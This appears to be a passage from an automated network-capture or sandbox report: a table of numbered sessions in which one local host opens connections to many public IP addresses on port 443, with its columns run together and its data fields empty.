                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13677192.168.2.1346654184.60.159.63443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13678192.168.2.134427050.206.7.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13679192.168.2.134511282.148.127.100443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13680192.168.2.1356132133.164.131.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13681192.168.2.1351846132.138.152.126443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13682192.168.2.1358824201.27.71.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13683192.168.2.1340564147.82.59.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13684192.168.2.1342632131.92.200.248443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13685192.168.2.1356010132.125.218.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13686192.168.2.1359382129.214.193.21443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13687192.168.2.133315891.9.85.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13688192.168.2.134573494.52.85.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13689192.168.2.1344914115.126.43.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13690192.168.2.133390046.55.45.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13691192.168.2.134187042.5.26.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13692192.168.2.135766092.76.60.69443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13693192.168.2.135531498.22.102.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13694192.168.2.1334366168.252.221.210443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13695192.168.2.1334204124.21.164.60443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13696192.168.2.134998674.36.26.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13697192.168.2.1343284138.243.67.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13698192.168.2.1359438168.89.144.125443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13699192.168.2.13555425.54.180.47443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13700192.168.2.134658254.93.31.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13701192.168.2.1348438109.52.252.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13702192.168.2.1339794187.36.102.237443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13703192.168.2.135984050.18.64.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13704192.168.2.1341966210.238.94.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13705192.168.2.13599481.237.245.207443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13706192.168.2.135400032.125.9.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13707192.168.2.133496298.136.18.118443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13708192.168.2.135396442.164.9.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13709192.168.2.134347869.95.92.67443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13710192.168.2.134885659.189.38.206443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13711192.168.2.1343738135.148.113.196443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13712192.168.2.1336118189.30.7.178443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13713192.168.2.133993057.72.115.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13714192.168.2.133678865.14.116.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13715192.168.2.1336120187.163.238.13443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13716192.168.2.1352414150.3.15.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13717192.168.2.1351404136.192.193.201443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13718192.168.2.1356520218.208.246.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13719192.168.2.1354748222.98.243.249443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13720192.168.2.1341636150.231.174.159443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13721192.168.2.1336718217.40.149.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13722192.168.2.133957885.138.41.164443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13723192.168.2.1347510205.74.25.136443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13724192.168.2.1341996106.86.215.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13725192.168.2.1356944150.163.144.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13726192.168.2.1337936156.146.87.241443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13727192.168.2.133897460.239.147.216443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13728192.168.2.1349516154.76.90.151443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13729192.168.2.1353350141.20.158.251443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13730192.168.2.1355288128.202.125.195443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13731192.168.2.1357450104.61.28.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13732192.168.2.135510213.78.244.116443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13733192.168.2.134454054.45.55.77443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13734192.168.2.1333410129.243.103.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13735192.168.2.1336876104.92.118.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13736192.168.2.1348322210.56.142.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13737192.168.2.1349826189.241.186.52443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13738192.168.2.134609691.43.149.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13739192.168.2.133674452.168.140.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13740192.168.2.1346068133.132.42.30443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13741192.168.2.1349376176.103.221.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13742192.168.2.1343220122.21.153.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13743192.168.2.1335782200.78.35.224443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13744192.168.2.1357476179.75.120.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13745192.168.2.1338448108.105.222.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13746192.168.2.135164620.10.55.174443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13747192.168.2.1351852157.138.80.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13748192.168.2.133566464.187.69.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13749192.168.2.1338582126.150.115.79443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13750192.168.2.133415641.241.193.45443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13751192.168.2.1346960220.87.178.255443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13752192.168.2.1334098181.1.166.123443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13753192.168.2.133419814.5.66.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13754192.168.2.1358504192.120.175.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13755192.168.2.1341354199.145.230.205443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13756192.168.2.133706224.34.187.134443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13757192.168.2.134725276.219.41.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13758192.168.2.133596624.108.101.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13759192.168.2.1344664107.86.57.17443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13760192.168.2.1335190171.204.70.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13761192.168.2.1340332116.93.79.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13762192.168.2.1357132190.246.227.72443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13763192.168.2.1357908187.181.93.31443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13764192.168.2.1346858154.42.152.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13765192.168.2.135090641.143.39.192443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13766192.168.2.133538050.26.59.135443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13767192.168.2.1350110176.227.155.155443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13768192.168.2.1359434142.195.153.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13769192.168.2.133861450.238.200.46443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13770192.168.2.133900463.43.237.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13771192.168.2.1349170149.210.56.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13772192.168.2.1357974189.222.83.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13773192.168.2.1350152160.106.79.227443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13774192.168.2.135306295.79.113.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13775192.168.2.133566474.14.124.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13776192.168.2.1347268187.104.244.247443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13777192.168.2.1338630121.12.184.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13778192.168.2.1351758165.36.130.222443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13779192.168.2.1348324143.99.25.112443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13780192.168.2.1338852142.58.2.12443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13781192.168.2.135089824.58.47.119443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13782192.168.2.1344652185.77.83.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13783192.168.2.134874847.244.158.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13784192.168.2.1342168222.164.140.48443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13785192.168.2.1337298169.225.21.188443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13786192.168.2.1359918204.229.47.111443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13787192.168.2.1338916112.232.56.231443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13788192.168.2.135502039.29.252.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13789192.168.2.1338608167.169.230.157443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13790192.168.2.1341250182.30.125.220443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13791192.168.2.134947686.41.227.163443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13792192.168.2.134801418.219.10.110443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13793192.168.2.134865853.58.26.81443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13794192.168.2.135242290.114.54.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13795192.168.2.133700445.122.84.152443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13796192.168.2.1350680162.195.51.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13797192.168.2.1339128173.202.148.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13798192.168.2.135562675.39.16.90443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13799192.168.2.1355534166.74.70.181443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13800192.168.2.1354962174.7.130.25443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13801192.168.2.1348112216.5.68.150443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13802192.168.2.135798012.12.229.187443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13803192.168.2.134450418.66.156.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13804192.168.2.1351138170.200.91.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13805192.168.2.1335490198.240.172.34443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13806192.168.2.1341546115.110.1.177443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13807192.168.2.133382835.226.245.89443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13808192.168.2.1353556223.63.102.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13809192.168.2.1349384146.245.189.74443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13810192.168.2.1341446143.175.107.120443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13811192.168.2.134745437.198.81.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13812192.168.2.134324857.161.247.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13813192.168.2.135004875.110.23.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13814192.168.2.1356218179.189.178.182443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13815192.168.2.133325691.164.191.5443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13816192.168.2.1358696114.71.197.66443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13817192.168.2.135254845.135.168.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13818192.168.2.1341180220.123.177.113443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13819192.168.2.1341840205.17.7.43443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13820192.168.2.1347088146.86.104.236443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13821192.168.2.1334564199.194.26.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13822192.168.2.133386219.245.187.87443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13823192.168.2.133919280.150.204.147443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13824192.168.2.1356838143.180.171.173443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13825192.168.2.1359020114.37.195.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13826192.168.2.1351004108.198.221.184443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13827192.168.2.1360252126.11.182.4443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13828192.168.2.1339800200.95.21.10443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13829192.168.2.1335700134.156.55.42443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13830192.168.2.1334076169.168.14.194443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13831192.168.2.13411704.85.2.61443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13832192.168.2.1343932159.209.87.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13833192.168.2.136026675.57.9.85443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13834192.168.2.133960662.232.202.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13835192.168.2.1335688117.63.207.6443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13836192.168.2.1335996187.19.151.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13837192.168.2.1335026117.12.142.213443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13838192.168.2.134443468.159.62.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13839192.168.2.133893872.26.156.253443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13840192.168.2.1347588113.198.75.104443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13841192.168.2.1360678213.250.185.219443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13842192.168.2.1336840123.237.239.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13843192.168.2.1348800115.170.196.212443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13844192.168.2.134877290.138.163.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13845192.168.2.1354184169.119.119.23443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13846192.168.2.1341818186.252.80.211443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13847192.168.2.133625882.69.224.122443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13848192.168.2.134780495.119.69.165443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13849192.168.2.1356514160.168.194.62443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13850192.168.2.135457275.249.70.102443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13851192.168.2.133527452.182.166.142443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13852192.168.2.134883079.98.135.193443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13853192.168.2.1347362167.126.188.139443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13854192.168.2.1355998223.127.60.88443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13855192.168.2.135123818.171.93.3443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13856192.168.2.13535641.136.5.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13857192.168.2.1339828128.173.92.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13858192.168.2.1348246199.203.42.35443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13859192.168.2.1339326116.119.90.130443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13860192.168.2.1349448188.25.53.202443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13861192.168.2.1334494122.220.130.93443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13862192.168.2.1357560196.88.124.36443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13863192.168.2.1343824128.93.165.244443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13864192.168.2.135601091.68.193.70443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13865192.168.2.135756080.224.39.94443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13866192.168.2.1340538138.253.254.37443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13867192.168.2.1343678135.41.125.121443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13868192.168.2.1344082213.35.204.191443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13869192.168.2.1347014183.0.250.190443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13870192.168.2.1345038210.127.233.39443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13871192.168.2.1334690201.252.232.76443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13872192.168.2.1360790192.22.59.168443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13873192.168.2.1359808110.31.18.27443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13874192.168.2.1351840110.24.157.115443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13875192.168.2.1345070185.220.4.82443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13876192.168.2.135178297.229.210.86443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13877192.168.2.1336200185.192.71.228443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13878192.168.2.1344070114.79.92.128443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13879192.168.2.133809446.59.73.64443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13880192.168.2.135456492.115.67.80443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13881192.168.2.1349878134.146.248.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13882192.168.2.1352036143.25.166.95443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13883192.168.2.134147641.225.191.91443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13884192.168.2.1349480146.32.206.235443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13885192.168.2.1357606180.110.28.232443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13886192.168.2.1357888116.18.240.56443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13887192.168.2.1352390181.127.198.208443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13888192.168.2.1357302188.161.28.250443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13889192.168.2.133584297.232.183.8443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13890192.168.2.1354590157.254.178.117443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13891192.168.2.134897832.104.117.254443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13892192.168.2.1359828177.159.230.7443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13893192.168.2.1340856212.214.53.170443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13894192.168.2.1335310173.35.201.106443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13895192.168.2.1350212151.163.156.197443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13896192.168.2.135795817.174.175.161443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    13897192.168.2.134168827.163.127.154443
                                    TimestampBytes transferredDirectionData


                                    Session IDSource IPSource PortDestination IPDestination Port
